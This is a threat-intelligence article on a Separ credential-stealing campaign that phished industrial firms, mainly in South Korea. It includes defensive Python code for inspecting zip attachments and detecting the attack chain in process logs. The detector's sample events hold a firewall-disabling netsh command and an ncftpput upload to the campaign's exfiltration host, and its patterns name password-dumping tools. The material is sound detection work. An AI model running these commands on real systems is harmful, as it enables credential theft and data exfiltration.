An ongoing industrial cyberespionage campaign is targeting hundreds of manufacturing and other industrial firms primarily located in South Korea, new research found.
The campaign steals passwords and documents. That information could then end up used to purloin trade secrets and valuable intellectual property, perform cyber reconnaissance for future attacks, and compromise industrial control networks for ransomware attacks, according to a report from David Atch, Maayan Shaul, Gil Regev, Ori Perez, and Phil Neray of CyberX’s threat intelligence team, Section 52.
The campaign uses spear phishing emails with industrial-themed attachments including:
• An RFQ for designing a power plant in the Czech Republic, which appears to have been sent by an employee of a Siemens subsidiary that manufactures industrial machinery. This email includes a schematic of the power plant and a publicly-available technical white paper about the gasification of the plant, which is located in Vresova, Czech Republic.
• An RFQ for designing a coal-fired power plant in Indonesia, purporting to be from the engineering subsidiary of a major Japanese conglomerate. To increase its appearance of legitimacy, the email includes a publicly-available PDF of the company’s corporate profile.
• An email purporting to be from a buyer at a major European engineering company that designs gas processing and production plants.
CyberX identified more than 200 compromised systems from this campaign, including one belonging to a multi-billion dollar Korean conglomerate that manufactures critical infrastructure equipment such as heavy equipment for power transmission and distribution facilities, renewable energy, chemical plants, welding, and construction.
Other South Korean victims include:
• Steel manufacturer
• Chemical plant construction firm
• Pipe manufacturer
• Valve manufacturer
• Engineering firm
The Section 52 team used an automated threat extraction platform called Ganymede to identify malware and APT campaigns targeting industrial and critical infrastructure organizations.
Ganymede continuously ingests large amounts of data from a range of open and closed sources. It uses machine learning algorithms to identify documents with IoT/ICS-specific content as well as any malicious attachments, and to monitor domains of industrial companies that might be targeted.
The campaign, which CyberX has dubbed Gangnam Industrial Style, uses a new version of the Separ credential-stealing malware, first identified by SonicWALL in 2013, the researchers said.
In this case, however, the malware is specifically targeting industrial organizations.
Once installed, the malware steals browser and email credentials and searches for documents with a range of extensions, including Office documents and images. It exfiltrates all collected information via FTP to a free web hosting service (freehostia.com).
The malware is hidden inside a zip file attached to the phishing emails. Once unzipped, the files often appear to be PDF files (with the PDF icon) but are actually malicious executables, the researchers said. The executables are a series of scripts compiled using the Quick Batch File Compiler.
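The disguise described above (an executable inside a zip, named and iconed to pass as a PDF) is cheap to catch at the mail gateway if attachments are judged by their bytes rather than their names. The following is an added example, not code from the CyberX report or from the Section 52 team: it opens a zip attachment in memory, reads the first bytes of each entry, and flags anything that carries a PE (`MZ`) header behind a document-style name or a document-then-executable double extension. The archive contents, entry names and the extension lists are constructed for the example.

```python
import io
import zipfile

# Magic bytes for the two formats the check distinguishes.
PE_MAGIC = b"MZ"
PDF_MAGIC = b"%PDF-"
# Extensions Windows will execute regardless of the icon shown in Explorer
# (constructed list for the example; extend to taste).
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif"}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def sniff_kind(head: bytes) -> str:
    """Classify a file by its leading bytes, never by its name."""
    if head.startswith(PE_MAGIC):
        return "pe"
    if head.startswith(PDF_MAGIC):
        return "pdf"
    return "other"


def split_extensions(filename: str):
    """Return (last extension, previous extension) lower-cased, e.g. ('.exe', '.pdf')."""
    base = filename.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    last = "." + parts[-1] if len(parts) > 1 else ""
    prev = "." + parts[-2] if len(parts) > 2 else ""
    return last, prev


def inspect_zip_attachment(zip_bytes: bytes) -> list:
    """Return (entry name, reason) pairs for entries that should be quarantined."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            with archive.open(info) as fh:
                head = fh.read(8)  # enough for both magic values
            kind = sniff_kind(head)
            last, prev = split_extensions(info.filename)
            if last in EXECUTABLE_EXTENSIONS and prev in DOCUMENT_EXTENSIONS:
                findings.append((info.filename, f"double extension {prev}{last}"))
            elif last in EXECUTABLE_EXTENSIONS:
                findings.append((info.filename, f"executable attachment ({last})"))
            elif kind == "pe":
                # A PE image named like a document: the icon can claim PDF, the header cannot.
                findings.append((info.filename, f"PE header behind a {last or 'no'} extension"))
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample zip: one genuine PDF and two disguised executables."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("RFQ/corporate_profile.pdf", PDF_MAGIC + b"1.4\n%%EOF\n")
        archive.writestr("RFQ/RFQ_power_plant.pdf.exe", PE_MAGIC + b"\x90\x00" + b"\x00" * 61)
        archive.writestr("RFQ/schematic.pdf", PE_MAGIC + b"\x90\x00" + b"\x00" * 61)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in inspect_zip_attachment(build_sample_archive()):
        print(f"QUARANTINE {name}: {reason}")
```

Running the block reports the `.pdf.exe` entry and the `schematic.pdf` entry, and passes the real PDF. The header check is what matters: Explorer's "hide extensions for known file types" default and an embedded PDF icon both fool a user, but neither changes the first two bytes of a Windows executable.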
The malware performs the following steps:
• Runs ipconfig to map all network adapters on the compromised system
• Disables Windows firewall
• Dumps browser passwords
• Dumps email passwords
• Collects files with specific extensions from user folders, mostly documents
• Uploads all the results to the FTP server ftp[.]freehostia[.]com
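Each of the steps listed above is noisy on its own (ipconfig runs constantly, admins toggle the firewall), but the sequence on one host inside a short window is a strong signal. The following is an added example, not code from the CyberX report: it maps each step to a pattern over process-creation command lines, groups hits by host, and alerts when a host shows a credential dump followed by an upload to the report's exfiltration domain, or three or more distinct stages within fifteen minutes. The report names the tools but not their command lines, so the executable names, the `netsh` syntax, the event format and the sample events are all constructed assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One indicator per step in the report's list. Patterns are constructed assumptions
# about how these tools appear in process-creation telemetry.
STAGE_PATTERNS = {
    "recon_ipconfig": re.compile(r"^ipconfig(\.exe)?\b", re.I),
    "firewall_disable": re.compile(r"^netsh(\.exe)?\b.*firewall.*\b(off|disable)\b", re.I),
    "browser_pw_dump": re.compile(r"browserpassworddump|lazagne\S*\s+browsers?", re.I),
    "email_pw_dump": re.compile(r"emailpassworddump|lazagne\S*\s+mails?", re.I),
    # freehostia.com is the exfiltration host named in the report.
    "ftp_exfil": re.compile(r"^(ncftpput|ftps?)(\.exe)?\b.*\bfreehostia\.com\b", re.I),
}
CREDENTIAL_STAGES = {"browser_pw_dump", "email_pw_dump"}
WINDOW = timedelta(minutes=15)

# Constructed process-creation events: ts|host|parent image|image|command line.
# WS-KR-017 runs the full chain; WS-KR-022 is benign admin activity.
SAMPLE_EVENTS = """\
2019-12-01T09:14:02Z|WS-KR-017|cmd.exe|ipconfig.exe|ipconfig /all
2019-12-01T09:14:03Z|WS-KR-017|cmd.exe|netsh.exe|netsh advfirewall set allprofiles state off
2019-12-01T09:14:05Z|WS-KR-017|cmd.exe|browserpassworddump.exe|browserpassworddump.exe
2019-12-01T09:14:06Z|WS-KR-017|cmd.exe|emailpassworddump.exe|emailpassworddump.exe
2019-12-01T09:14:40Z|WS-KR-017|cmd.exe|ncftpput.exe|ncftpput -u user -p pass ftp.freehostia.com /upload C:\\Users\\Public\\out.zip
2019-12-01T10:02:11Z|WS-KR-022|explorer.exe|ipconfig.exe|ipconfig /all
2019-12-01T11:30:00Z|WS-KR-022|cmd.exe|ncftpput.exe|ncftpput -u user -p pass ftp.example.internal /backup C:\\Data\\report.pdf
"""


def parse_events(text: str) -> list:
    """Parse the pipe-delimited sample format into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host, "parent": parent, "image": image, "cmdline": cmdline,
        })
    return events


def classify(event):
    """Return the stage name a command line matches, or None."""
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(event["cmdline"]):
            return stage
    return None


def detect_separ_like_chain(events) -> dict:
    """Return {host: sorted stage names} for hosts whose activity matches the chain.

    A host alerts when, inside WINDOW, it shows (a) a credential dump followed by an
    upload to the exfiltration host, or (b) three or more distinct stages.
    """
    by_host = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            by_host[ev["host"]].append((ev["ts"], stage))

    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            window = [s for t, s in hits[i:] if t - start <= WINDOW]
            seen_cred = dump_then_exfil = False
            for s in window:
                if s in CREDENTIAL_STAGES:
                    seen_cred = True
                elif s == "ftp_exfil" and seen_cred:
                    dump_then_exfil = True
            stages = set(window)
            if dump_then_exfil or len(stages) >= 3:
                alerts[host] = sorted(stages)
                break
    return alerts


if __name__ == "__main__":
    for host, stages in detect_separ_like_chain(parse_events(SAMPLE_EVENTS)).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```

Only WS-KR-017 alerts; WS-KR-022's lone ipconfig and its FTP push to an internal host never reach the threshold. In production the same logic maps onto Sysmon Event ID 1 or EDR process telemetry, and the exfiltration pattern is the term worth keeping loose (any FTP client to any free hosting provider) since the domain is the easiest part for the operators to rotate.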
The malware incorporates the following tools, most of which are freely available on the Internet:
• Browser Password Dump v6.0 by SecurityXploded
• Email Password Dump v3.0 by SecurityXploded
• NcFTPPut 3.2.5 – Free FTP client
• The LaZagne Project (password dumper from https://github.com/AlessandroZ/LaZagne)
• deltree (Folder delete from https://github.com/johnmbaughman/deltree)
• Command Line Process Viewer/Killer/Suspender for Windows NT/2000/XP V2.03
• MOVEit Freely 184.108.40.206 – Secure FTP Client
• Sleep tool by tricerat
The Separ malware collects files as well as passwords from compromised systems, whereas the previous version only collected passwords, researchers said. In addition, the new version uses Autorun to persist after reboots.
The Gangnam Industrial Style campaign is still ongoing, as evidenced by newly stolen credentials continuing to be uploaded to the adversary’s C2 server, the researchers said.
Over the past few months, Section 52 identified the following countries and industries targeted by the malware:
• Distribution of targeted companies by region: Japan, Indonesia, Turkey, Germany, Ecuador, UK, Korea, China, Thailand, and other.
• Distribution of targets by industry: Manufacturing, steel, engineering, conglomerate, and other.
Safeguarding your organization from these targeted industrial campaigns requires a multi-layered defense incorporating:
1. Teaching employees to be wary of email attachments, especially zipped or compressed files purporting to contain details about “RFPs”.
2. Email security to detect suspicious emails.
3. Endpoint security to identify malware.
4. Network segmentation to restrict the adversary’s ability to navigate from IT to OT networks.
5. Secure remote access solutions with MFA to prevent unauthorized access using stolen credentials.
6. IoT/ICS-specific network security monitoring to detect suspicious or unauthorized access to industrial control networks.
7. Industrial threat intelligence to stay current about these types of attacks, while operationalizing this intelligence by integrating it with your security stack (SIEMs, monitoring systems, etc.).